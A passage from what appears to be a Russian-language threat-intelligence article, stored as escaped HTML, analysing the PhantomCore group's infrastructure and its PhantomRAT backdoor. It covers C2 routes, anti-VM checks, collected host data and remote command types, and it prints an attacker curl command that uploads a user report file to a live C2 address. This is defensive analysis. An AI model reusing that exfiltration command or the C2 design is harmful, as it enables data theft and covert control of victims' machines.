\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Discovery).<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u044b:<\/p>\n<ul>\n<li>\n<p>\/upload\u00a0\u2014 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9fa\/46c\/2e6\/9fa46c2e6c3f1229b14718ff178e4a40.png\" alt=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0430-\u0430\u0433\u0440\u0435\u0433\u0430\u0442\u043e\u0440\u0430\" title=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0430-\u0430\u0433\u0440\u0435\u0433\u0430\u0442\u043e\u0440\u0430\" width=\"1259\" height=\"286\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9fa\/46c\/2e6\/9fa46c2e6c3f1229b14718ff178e4a40.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9fa\/46c\/2e6\/9fa46c2e6c3f1229b14718ff178e4a40.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u2011\u0430\u0433\u0440\u0435\u0433\u0430\u0442\u043e\u0440\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u043d\u0430\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u0430\u044f \u0432\u00a0\u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 Windows \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomTaskShell:<\/p>\n<p><code>C:\\Windows\\System32\\curl.exe -v -F \"file=@C:\\ProgramData\\user_report.txt\" -F \"destinationPath=.\/user_report.txt\" http:\/\/185.130.249.224:80\/upload'<\/code><\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n<p><code>185.130.249.224<\/code><\/p>\n<\/li>\n<\/ol>\n<p>\u0413\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e\u00a0\u043f\u043e\u0447\u0442\u0438 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 (48%) \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u044b \u0432\u00a0\u0420\u043e\u0441\u0441\u0438\u0438, \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0432\u00a0\u0441\u0435\u0442\u044f\u0445 \u0442\u0440\u0435\u0445 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u043e\u0432 \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430:<\/p>\n<ul>\n<li>\n<p>LLC Smart Ape\u00a0\u2014 AS56694\u00a0(28%)<\/p>\n<\/li>\n<li>\n<p>Mt Finance LLC\u00a0\u2014 AS214822\u00a0(14%)<\/p>\n<\/li>\n<li>\n<p>First Server Limited\u00a0\u2014 AS204997\u00a0(5%)<\/p>\n<\/li>\n<\/ul>\n<p>\u0414\u0435\u0432\u044f\u0442\u043d\u0430\u0434\u0446\u0430\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u043d\u0442\u043e\u0432 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u044b \u0432\u00a0\u043f\u043e\u0434\u0441\u0435\u0442\u0438 185.130.248.0\/22. \u0414\u043e\u043b\u044f \u0437\u0430\u0440\u0443\u0431\u0435\u0436\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 52%, \u043e\u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0440\u0430\u0432\u043d\u043e\u043c\u0435\u0440\u043d\u043e \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0430 \u043c\u0435\u0436\u0434\u0443 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c\u0438 \u0441\u0442\u0440\u0430\u043d\u0430\u043c\u0438: \u0424\u0438\u043d\u043b\u044f\u043d\u0434\u0438\u044f (9%), \u0424\u0440\u0430\u043d\u0446\u0438\u044f (9%), \u041d\u0438\u0434\u0435\u0440\u043b\u0430\u043d\u0434\u044b (9%), \u0421\u0428\u0410 (5%), \u0413\u0435\u0440\u043c\u0430\u043d\u0438\u044f (5%), \u0413\u043e\u043d\u043a\u043e\u043d\u0433 (5%), \u041c\u043e\u043b\u0434\u0430\u0432\u0438\u044f (5%), \u041f\u043e\u043b\u044c\u0448\u0430 (5%). \u041f\u0440\u0438\u00a0\u044d\u0442\u043e\u043c 33% \u0432\u0441\u0435\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u044b \u0432\u00a0\u0441\u0435\u0442\u044f\u0445 \u043a\u0430\u043d\u0430\u0434\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 Cgi Global Limited.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b72\/e1e\/63b\/b72e1e63b797acf98f8b9002e16bf70c.png\" alt=\"\u0420\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043f\u043e \u0441\u0442\u0440\u0430\u043d\u0430\u043c\" title=\"\u0420\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043f\u043e \u0441\u0442\u0440\u0430\u043d\u0430\u043c\" width=\"1800\" height=\"800\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b72\/e1e\/63b\/b72e1e63b797acf98f8b9002e16bf70c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b72\/e1e\/63b\/b72e1e63b797acf98f8b9002e16bf70c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043f\u043e\u00a0\u0441\u0442\u0440\u0430\u043d\u0430\u043c<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/194\/416\/426\/194416426429b8ee8bb80a72910f5174.png\" alt=\"\u0420\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043f\u043e \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430\u043c \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430\" title=\"\u0420\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043f\u043e \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430\u043c \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430\" width=\"1800\" height=\"800\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/194\/416\/426\/194416426429b8ee8bb80a72910f5174.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/194\/416\/426\/194416426429b8ee8bb80a72910f5174.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043f\u043e\u00a0\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430\u043c \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430<\/figcaption><\/div>\n<\/figure>\n<h2>\u0410\u043d\u0430\u043b\u0438\u0437 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432<\/h2>\n<ol>\n<li>\n<p>PhantomRAT<\/p>\n<p>PhantomRAT\u00a0\u2014 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430\u00a0Go \u0431\u044d\u043a\u0434\u043e\u0440, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432\u00a0\u0432\u0438\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e PE\u2011\u0444\u0430\u0439\u043b\u0430 \u043d\u0430\u00a0\u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0430\u0434\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u0434\u043b\u044f\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0435\u0439\u0434\u0436\u0435\u0439: PhantomTaskShell, PhantomProxyLite, MeshAgent, RSocx.<\/p>\n<p>\u0412\u00a0\u0431\u044d\u043a\u0434\u043e\u0440\u0435 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0442\u0435\u0445\u043d\u0438\u043a \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence) \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435.<\/p>\n<ul>\n<li>\n<p>\u041f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Defence Evasion)<\/p>\n<\/li>\n<\/ul>\n<p>\u0414\u043b\u044f\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043e\u0442\u043b\u0430\u0434\u043a\u0438, \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 PhantomRAT<strong> <\/strong>\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 WinAPI\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u044e IsDebuggerPresent(), \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043a\u043b\u044e\u0447\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 Windows DriverDesc \u0438 SYSTEM\\ControlSet001\\Services\\Disk \u043d\u0430\u00a0\u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u00abvmware\u00bb.<\/p>\n<ul>\n<li>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 (Discovery)<\/p>\n<p>PhantomRAT<strong> <\/strong>\u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\"><strong>\u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u0417\u043d\u0430\u0447\u0435\u043d\u0438\u0435<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u0421\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">host<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0418\u043c\u044f \u0445\u043e\u0441\u0442\u0430<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u044b\u0437\u043e\u0432 golang\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 os.hostname()<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">user<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0418\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0417\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f USERNAME, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u043e\u0435 \u0447\u0435\u0440\u0435\u0437 \u0432\u044b\u0437\u043e\u0432 golang\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 os.Getenv()<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">domain<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0414\u043e\u043c\u0435\u043d<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0417\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f USERDOMAIN, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u043e\u0435 \u0447\u0435\u0440\u0435\u0437 \u0432\u044b\u0437\u043e\u0432 golang\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 os.Getenv()<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">local_ip<\/p>\n<\/td>\n<td>\n<p align=\"left\">IP\u2011\u0430\u0434\u0440\u0435\u0441 \u0445\u043e\u0441\u0442\u0430 \u0432\u00a0\u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u044b\u0437\u043e\u0432 golang\u2011\u0444\u0443\u043d\u043a\u0446\u0438\u0438 net.InterfaceAddrs()<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">public_ip<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u043d\u0435\u0448\u043d\u0438\u0439 IP\u2011\u0430\u0434\u0440\u0435\u0441 \u0445\u043e\u0441\u0442\u0430<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0417\u0430\u043f\u0440\u043e\u0441 \u043a\u00a0\u0432\u043d\u0435\u0448\u043d\u0435\u043c\u0443 \u0441\u0435\u0440\u0432\u0438\u0441\u0443 <a href=\"https:\/\/ident.me\" rel=\"noopener noreferrer nofollow\">https:\/\/ident.me<\/a><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<\/li>\n<li>\n<p>\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f (Command and Control)<\/p>\n<p>PhantomRAT<strong> <\/strong>\u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c:<\/p>\n<p><code>GET \/connect\u00a0<\/code><\/p>\n<p>\u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 JSON \u0441\u00a0\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435:<\/p>\n<p><code>POST \/init<\/code><\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c4c\/f6e\/04e\/c4cf6e04ecea333712f4a91a86c0d6cd.png\" alt=\"JSON \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435\" title=\"JSON \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435\" width=\"859\" height=\"273\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c4c\/f6e\/04e\/c4cf6e04ecea333712f4a91a86c0d6cd.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c4c\/f6e\/04e\/c4cf6e04ecea333712f4a91a86c0d6cd.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>JSON \u0441\u00a0\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435<\/figcaption><\/div>\n<\/figure>\n<p>\u0414\u0430\u043b\u0435\u0435 PhantomRAT \u0446\u0438\u043a\u043b\u0438\u0447\u043d\u043e \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0443\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435:<\/p>\n<p><code>POST \/command<\/code><\/p>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 JSON \u0441\u00a0\u043f\u043e\u043b\u0435\u043c Response, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u043c \u0442\u0438\u043f (cmd_id) \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 (cmd_data) \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/657\/2d1\/619\/6572d16194079f671c970ebad922adcb.png\" alt=\"JSON \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0435\" title=\"JSON \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0435\" width=\"951\" height=\"206\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/657\/2d1\/619\/6572d16194079f671c970ebad922adcb.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/657\/2d1\/619\/6572d16194079f671c970ebad922adcb.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>JSON \u0441\u00a0\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e\u00a0\u043a\u043e\u043c\u0430\u043d\u0434\u0435<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \u0442\u0438\u043f\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u044b (cmd_id)\u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\"><strong>\u041a\u043e\u043c\u0430\u043d\u0434\u0430<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u041d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Up<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0444\u0430\u0439\u043b\u0430 \u0441\u00a0\u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430 \u0432\u00a0\u0437\u0430\u0448\u0438\u0442\u0443\u044e \u0432\u00a0\u043a\u043e\u0434\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e C:\\ProgramData\\<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Ex<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u043d\u043e\u0439 \u0432\u00a0cmd_data \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u00a0\u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 \u0432\u00a0\u0444\u043e\u0440\u043c\u0430\u0442\u0435: cmd \/s \/c \u00ab&lt;cmd_data&gt; | cmd\u00bb<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">St<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0417\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0440\u0430\u043d\u0435\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430): cmd.exe \/C start \u00ab&lt;cmd_data&gt;\u00bb<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b PhantomRAT \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u00a0JSON \u0441\u00a0\u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0439 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439:<\/p>\n<p><code>POST \/out<\/code><\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/329\/9dd\/3ed\/3299dd3ed42453eabec1d625742ccb41.png\" alt=\"JSON \u0441 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b\" title=\"JSON \u0441 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b\" width=\"830\" height=\"212\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/329\/9dd\/3ed\/3299dd3ed42453eabec1d625742ccb41.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/329\/9dd\/3ed\/3299dd3ed42453eabec1d625742ccb41.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>JSON 